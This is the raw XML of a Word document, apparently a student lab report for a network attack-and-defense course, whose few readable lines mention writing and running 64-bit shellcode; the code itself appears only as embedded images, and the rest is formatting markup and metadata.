        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC3247">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>任务三：写64bit的shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132F78ED" w14:textId="08606BED" w:rsidR="00230522" w:rsidRDefault="00EB7E2A" w:rsidP="00230522">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00EB7E2A">
        <w:lastRenderedPageBreak/>
        <w:t>将占位符替换为%0的操作修改mysh_64，代码如下：</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00EB7E2A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7619088F" wp14:editId="396A4F42">
            <wp:extent cx="2771795" cy="3152798"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="1489811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111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1795" cy="31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CE6C" w14:textId="7DFB4998" w:rsidR="00EB7E2A" w:rsidRDefault="00EB7E2A" w:rsidP="00230522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编译并运行，成功</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00CC3247">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C43418F" wp14:editId="5334580C">
            <wp:extent cx="5274310" cy="1517015"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:docPr id="875587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87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A446" w14:textId="77777777" w:rsidR="00CC3247" w:rsidRDefault="00CC3247" w:rsidP="00CC3247">
      <w:pPr>
        <w:ind w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58CB963D" w14:textId="1AB31973" w:rsidR="00CC3247" w:rsidRPr="007D4318" w:rsidRDefault="00CC3247" w:rsidP="00CC3247">
      <w:pPr>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00CC3247" w:rsidRPr="007D4318" w:rsidSect="008C1E6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D69F4" w14:textId="77777777" w:rsidR="004806E6" w:rsidRDefault="004806E6" w:rsidP="008D0DA3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193F184A" w14:textId="77777777" w:rsidR="004806E6" w:rsidRDefault="004806E6" w:rsidP="008D0DA3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9C5C4" w14:textId="77777777" w:rsidR="008C1E61" w:rsidRDefault="008C1E61">
    <w:pPr>
      <w:pStyle w:val="a9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BFEEA" w14:textId="77777777" w:rsidR="008C1E61" w:rsidRDefault="008C1E61">
    <w:pPr>
      <w:pStyle w:val="a9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9D022" w14:textId="77777777" w:rsidR="008C1E61" w:rsidRDefault="008C1E61">
    <w:pPr>
      <w:pStyle w:val="a9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08741" w14:textId="77777777" w:rsidR="004806E6" w:rsidRDefault="004806E6" w:rsidP="008D0DA3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45180DDE" w14:textId="77777777" w:rsidR="004806E6" w:rsidRDefault="004806E6" w:rsidP="008D0DA3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7006B" w14:textId="77777777" w:rsidR="008C1E61" w:rsidRDefault="008C1E61">
    <w:pPr>
      <w:pStyle w:val="a7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99556" w14:textId="2637A95F" w:rsidR="008C1E61" w:rsidRDefault="008C1E61" w:rsidP="008C1E61">
    <w:pPr>
      <w:pStyle w:val="a7"/>
      <w:ind w:firstLine="360"/>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="008C1E61">
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
      <w:t>网络攻防技术</w:t>
    </w:r>
    <w:r w:rsidRPr="008C1E61">
      <w:t>(31400604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48B6B" w14:textId="77777777" w:rsidR="008C1E61" w:rsidRDefault="008C1E61">
    <w:pPr>
      <w:pStyle w:val="a7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77EC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="76AE6FA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64E15C1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A438753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8AF60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9454874"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CB10D67A"/>
    <w:lvl w:ilvl="0" w:tplc="F00A41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727A16"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CE70287C"/>
    <w:lvl w:ilvl="0" w:tplc="DED4F9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5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0E434181"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="06B6BBEA"/>
    <w:lvl w:ilvl="0" w:tplc="5A94312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6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0EF33391"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8A009F70"/>
    <w:lvl w:ilvl="0" w:tplc="DED4F9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7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="10E00860"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E6E8ECD6"/>
    <w:lvl w:ilvl="0" w:tplc="757A5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0E0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A97A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6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AC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25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07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E5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44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6A325B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DB10877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4C320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D6573B2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7882828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0F876F6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="34422868"/>
    <w:lvl w:ilvl="0" w:tplc="B8C4AD66">
      <w:start w:val="1"/>
      <w:numFmt w:val="japaneseCounting"/>
      <w:lvlText w:val="(%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1059" w:hanging="744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9310CC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="881C2338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8980B6A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4CEEC528"/>
    <w:lvl w:ilvl="0" w:tplc="028AB4CE">
      <w:start w:val="1"/>
      <w:numFmt w:val="japaneseCounting"/>
      <w:pStyle w:val="1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7572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3FC127C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9DE4C134"/>
    <w:lvl w:ilvl="0" w:tplc="6BAAFA0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6A8B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E5C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864F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A4BA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61BA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CAC6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F0C05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C4F5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14AB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8EB42DA6"/>
    <w:lvl w:ilvl="0" w:tplc="9D84633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7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="46696E6D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F98276BE"/>
    <w:lvl w:ilvl="0" w:tplc="5798F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675284"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3F2E498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637E35"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F2D0C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57A529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846B88"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="297AA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24F7AC"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="181A14B4"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="4"/>
      <w:numFmt w:val="chineseCounting"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="%1、"/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hAnsi="黑体"/>
        <w:sz w:val="30"/>
        <w:szCs w:val="30"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="22" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="583B1BB6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="803C23CA"/>
    <w:lvl w:ilvl="0" w:tplc="4B5A16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4D1675"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="904EA0DC"/>
    <w:lvl w:ilvl="0" w:tplc="C644AD00">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="960" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋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4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="597C2651"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CE70287C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lowerLetter"/>
      <w:lvlText w:val="%5)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lowerLetter"/>
      <w:lvlText w:val="%8)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5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5C817DC4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B626411E"/>
    <w:lvl w:ilvl="0" w:tplc="BBAAF10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6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="619C706D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9606061A"/>
    <w:lvl w:ilvl="0" w:tplc="B8C4AD66">
      <w:start w:val="1"/>
      <w:numFmt w:val="japaneseCounting"/>
      <w:lvlText w:val="(%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1059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7" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="70AF2773"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="48E02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337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48090437">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1184976256">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1715883058">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1037898987">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="777453639">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="251934800">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="652491126">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1982341803">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="680157522">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1137455539">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="883717386">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="681708562">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1705866623">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1557469499">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1636174610">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="650915031">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1440182842">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="1175460527">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="585381337">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="1985965381">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="1554193810">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="970746066">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="2062365360">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="1127745526">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="941646090">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="1364213929">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="1630017654">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="2075547377">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="927276805">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="1365058776">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="122820580">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="32" w16cid:durableId="110827953">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="33" w16cid:durableId="1683705529">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="34" w16cid:durableId="122502400">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="35" w16cid:durableId="969825605">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="36" w16cid:durableId="1914198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52"/>
    <w:rsid w:val="000100B9"/>
    <w:rsid w:val="00030E6E"/>
    <w:rsid w:val="00031F1A"/>
    <w:rsid w:val="00046C7C"/>
    <w:rsid w:val="00046E25"/>
    <w:rsid w:val="00063B01"/>
    <w:rsid w:val="000653DD"/>
    <w:rsid w:val="000862A9"/>
    <w:rsid w:val="000A68A5"/>
    <w:rsid w:val="000B0E54"/>
    <w:rsid w:val="000B1EA9"/>
    <w:rsid w:val="000B649E"/>
    <w:rsid w:val="000B7AC7"/>
    <w:rsid w:val="0010042A"/>
    <w:rsid w:val="00102769"/>
    <w:rsid w:val="00106D55"/>
    <w:rsid w:val="001109CF"/>
    <w:rsid w:val="001505CE"/>
    <w:rsid w:val="00154D8F"/>
    <w:rsid w:val="00184542"/>
    <w:rsid w:val="001B1721"/>
    <w:rsid w:val="001B186A"/>
    <w:rsid w:val="001B7766"/>
    <w:rsid w:val="001F6A02"/>
    <w:rsid w:val="00225997"/>
    <w:rsid w:val="00230522"/>
    <w:rsid w:val="00240811"/>
    <w:rsid w:val="00240AB6"/>
    <w:rsid w:val="00261DF4"/>
    <w:rsid w:val="00276139"/>
    <w:rsid w:val="00280A73"/>
    <w:rsid w:val="002929DE"/>
    <w:rsid w:val="002A74E0"/>
    <w:rsid w:val="002B2EA3"/>
    <w:rsid w:val="002D1A79"/>
    <w:rsid w:val="002E7974"/>
    <w:rsid w:val="00315EDB"/>
    <w:rsid w:val="003201E4"/>
    <w:rsid w:val="003234F6"/>
    <w:rsid w:val="00324AF1"/>
    <w:rsid w:val="00344CD1"/>
    <w:rsid w:val="00357DB3"/>
    <w:rsid w:val="00365A40"/>
    <w:rsid w:val="0037085C"/>
    <w:rsid w:val="00380244"/>
    <w:rsid w:val="0038120E"/>
    <w:rsid w:val="00386FF1"/>
    <w:rsid w:val="003949AC"/>
    <w:rsid w:val="0039685D"/>
    <w:rsid w:val="003C26AF"/>
    <w:rsid w:val="003C69CF"/>
    <w:rsid w:val="003F4BFF"/>
    <w:rsid w:val="00402A89"/>
    <w:rsid w:val="00420985"/>
    <w:rsid w:val="004806E6"/>
    <w:rsid w:val="004851A7"/>
    <w:rsid w:val="004C192B"/>
    <w:rsid w:val="004C7C21"/>
    <w:rsid w:val="00520821"/>
    <w:rsid w:val="00523BBA"/>
    <w:rsid w:val="00532CEC"/>
    <w:rsid w:val="005455D5"/>
    <w:rsid w:val="00547000"/>
    <w:rsid w:val="0055355C"/>
    <w:rsid w:val="00561231"/>
    <w:rsid w:val="00563968"/>
    <w:rsid w:val="00591985"/>
    <w:rsid w:val="005B40EB"/>
    <w:rsid w:val="005B41AC"/>
    <w:rsid w:val="005C15CA"/>
    <w:rsid w:val="005D0B50"/>
    <w:rsid w:val="005E3462"/>
    <w:rsid w:val="005E3DA4"/>
    <w:rsid w:val="005E711E"/>
    <w:rsid w:val="005F4978"/>
    <w:rsid w:val="005F5585"/>
    <w:rsid w:val="00622F23"/>
    <w:rsid w:val="006342C4"/>
    <w:rsid w:val="006371C6"/>
    <w:rsid w:val="00660F52"/>
    <w:rsid w:val="00677441"/>
    <w:rsid w:val="0067799B"/>
    <w:rsid w:val="00677BE0"/>
    <w:rsid w:val="00682CF1"/>
    <w:rsid w:val="00684D90"/>
    <w:rsid w:val="0068734C"/>
    <w:rsid w:val="00687447"/>
    <w:rsid w:val="006920C9"/>
    <w:rsid w:val="006944AD"/>
    <w:rsid w:val="006A2E56"/>
    <w:rsid w:val="006D0FE0"/>
    <w:rsid w:val="006E0994"/>
    <w:rsid w:val="006E49C7"/>
    <w:rsid w:val="006E682A"/>
    <w:rsid w:val="006E6B32"/>
    <w:rsid w:val="00710D6B"/>
    <w:rsid w:val="00722A3F"/>
    <w:rsid w:val="00731C1D"/>
    <w:rsid w:val="00750430"/>
    <w:rsid w:val="007526AA"/>
    <w:rsid w:val="00764BB1"/>
    <w:rsid w:val="00786E2D"/>
    <w:rsid w:val="007916D0"/>
    <w:rsid w:val="00795781"/>
    <w:rsid w:val="0079701F"/>
    <w:rsid w:val="007A543A"/>
    <w:rsid w:val="007B2661"/>
    <w:rsid w:val="007C47E6"/>
    <w:rsid w:val="007C619E"/>
    <w:rsid w:val="007D4318"/>
    <w:rsid w:val="007E035F"/>
    <w:rsid w:val="008044B6"/>
    <w:rsid w:val="00816367"/>
    <w:rsid w:val="0081740E"/>
    <w:rsid w:val="00850AD8"/>
    <w:rsid w:val="00860720"/>
    <w:rsid w:val="00861B9C"/>
    <w:rsid w:val="00862749"/>
    <w:rsid w:val="00880828"/>
    <w:rsid w:val="008B58E5"/>
    <w:rsid w:val="008C1E61"/>
    <w:rsid w:val="008D0DA3"/>
    <w:rsid w:val="008E1889"/>
    <w:rsid w:val="008E40E3"/>
    <w:rsid w:val="008F1F81"/>
    <w:rsid w:val="00907ABE"/>
    <w:rsid w:val="009224F3"/>
    <w:rsid w:val="009257B7"/>
    <w:rsid w:val="009314C7"/>
    <w:rsid w:val="00941753"/>
    <w:rsid w:val="00945BBA"/>
    <w:rsid w:val="0096406F"/>
    <w:rsid w:val="009866F4"/>
    <w:rsid w:val="00990A17"/>
    <w:rsid w:val="00993C1A"/>
    <w:rsid w:val="009D45CC"/>
    <w:rsid w:val="009F0322"/>
    <w:rsid w:val="00A15587"/>
    <w:rsid w:val="00A27E0C"/>
    <w:rsid w:val="00A42644"/>
    <w:rsid w:val="00A50C46"/>
    <w:rsid w:val="00A72161"/>
    <w:rsid w:val="00A73E1C"/>
    <w:rsid w:val="00A85DC4"/>
    <w:rsid w:val="00A86964"/>
    <w:rsid w:val="00A92EB0"/>
    <w:rsid w:val="00A936BB"/>
    <w:rsid w:val="00AC7A18"/>
    <w:rsid w:val="00AC7BFB"/>
    <w:rsid w:val="00AE4CF0"/>
    <w:rsid w:val="00AE604C"/>
    <w:rsid w:val="00AE7056"/>
    <w:rsid w:val="00AF108D"/>
    <w:rsid w:val="00AF7E7F"/>
    <w:rsid w:val="00B22891"/>
    <w:rsid w:val="00B271ED"/>
    <w:rsid w:val="00B30CAF"/>
    <w:rsid w:val="00B50B4E"/>
    <w:rsid w:val="00B53C87"/>
    <w:rsid w:val="00B71EFA"/>
    <w:rsid w:val="00B85504"/>
    <w:rsid w:val="00B86F39"/>
    <w:rsid w:val="00BA759C"/>
    <w:rsid w:val="00BB2B1F"/>
    <w:rsid w:val="00BB3403"/>
    <w:rsid w:val="00BB6B89"/>
    <w:rsid w:val="00BB7AC9"/>
    <w:rsid w:val="00BD15E5"/>
    <w:rsid w:val="00BD5DA0"/>
    <w:rsid w:val="00C1070E"/>
    <w:rsid w:val="00C1568F"/>
    <w:rsid w:val="00C67CE2"/>
    <w:rsid w:val="00C71245"/>
    <w:rsid w:val="00C7779D"/>
    <w:rsid w:val="00C904E9"/>
    <w:rsid w:val="00C90ACC"/>
    <w:rsid w:val="00C91119"/>
    <w:rsid w:val="00C93831"/>
    <w:rsid w:val="00CA7EBF"/>
    <w:rsid w:val="00CB0210"/>
    <w:rsid w:val="00CB3FEA"/>
    <w:rsid w:val="00CC3247"/>
    <w:rsid w:val="00CE6523"/>
    <w:rsid w:val="00CE713A"/>
    <w:rsid w:val="00CF25BC"/>
    <w:rsid w:val="00CF6B0B"/>
    <w:rsid w:val="00D05C64"/>
    <w:rsid w:val="00D14BF5"/>
    <w:rsid w:val="00D203E5"/>
    <w:rsid w:val="00D37A9C"/>
    <w:rsid w:val="00D430B6"/>
    <w:rsid w:val="00D572EA"/>
    <w:rsid w:val="00D605AA"/>
    <w:rsid w:val="00D6541F"/>
    <w:rsid w:val="00D66182"/>
    <w:rsid w:val="00D8424D"/>
    <w:rsid w:val="00D903B1"/>
    <w:rsid w:val="00D96AFC"/>
    <w:rsid w:val="00DB2ED5"/>
    <w:rsid w:val="00DC19D5"/>
    <w:rsid w:val="00DC5FF6"/>
    <w:rsid w:val="00DD5769"/>
    <w:rsid w:val="00DE41F6"/>
    <w:rsid w:val="00DF48D7"/>
    <w:rsid w:val="00DF500E"/>
    <w:rsid w:val="00E11BEC"/>
    <w:rsid w:val="00E20FE9"/>
    <w:rsid w:val="00E223EA"/>
    <w:rsid w:val="00E31B1D"/>
    <w:rsid w:val="00E54ECD"/>
    <w:rsid w:val="00E55047"/>
    <w:rsid w:val="00E66F97"/>
    <w:rsid w:val="00E70C96"/>
    <w:rsid w:val="00E76208"/>
    <w:rsid w:val="00E80071"/>
    <w:rsid w:val="00E83301"/>
    <w:rsid w:val="00E90330"/>
    <w:rsid w:val="00E94AB0"/>
    <w:rsid w:val="00EA070C"/>
    <w:rsid w:val="00EA2424"/>
    <w:rsid w:val="00EB2CF2"/>
    <w:rsid w:val="00EB4098"/>
    <w:rsid w:val="00EB7E2A"/>
    <w:rsid w:val="00EC1D19"/>
    <w:rsid w:val="00EC570B"/>
    <w:rsid w:val="00EC5739"/>
    <w:rsid w:val="00ED7203"/>
    <w:rsid w:val="00EE6419"/>
    <w:rsid w:val="00EF7A52"/>
    <w:rsid w:val="00F33B48"/>
    <w:rsid w:val="00F3524E"/>
    <w:rsid w:val="00F3572E"/>
    <w:rsid w:val="00F408C2"/>
    <w:rsid w:val="00F44673"/>
    <w:rsid w:val="00F50483"/>
    <w:rsid w:val="00F53876"/>
    <w:rsid w:val="00F619AD"/>
    <w:rsid w:val="00F81873"/>
    <w:rsid w:val="00FA0F0C"/>
    <w:rsid w:val="00FA60F9"/>
    <w:rsid w:val="00FA7BF4"/>
    <w:rsid w:val="00FB36B1"/>
    <w:rsid w:val="00FB68AE"/>
    <w:rsid w:val="00FC0116"/>
    <w:rsid w:val="00FC5761"/>
    <w:rsid w:val="00FC6183"/>
    <w:rsid w:val="00FC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F5ED5"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{3B9DE8EF-20F2-43B0-A03D-5B2EC8F2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86A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C7BFB"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:numPr>
        <w:numId w:val="11"/>
      </w:numPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1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5047"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1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61"/>
    <w:pPr>
      <w:widowControl/>
      <w:ind w:firstLine="420"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Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0010276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0276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D0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0DA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0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0DA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C7BFB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5504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7447"/>
    <w:pPr>
      <w:widowControl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7447"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="a"/>
    <w:next w:val="a"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0068744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843">
          <w:marLeft w:val="184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60">
          <w:marLeft w:val="184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174">
          <w:marLeft w:val="184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931">
          <w:marLeft w:val="184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966">
          <w:marLeft w:val="763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041">
          <w:marLeft w:val="203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567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612">
          <w:marLeft w:val="203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34">
          <w:marLeft w:val="20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ABAF-CCCD-444C-A893-0BF5FBE9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y Little</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Zero Spade</cp:lastModifiedBy>
  <cp:revision>134</cp:revision>
  <cp:lastPrinted>2019-11-28T05:12:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-11-20T14:24:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-10-22T12:04:00Z</dcterms:modified>
</cp:coreProperties>
</file>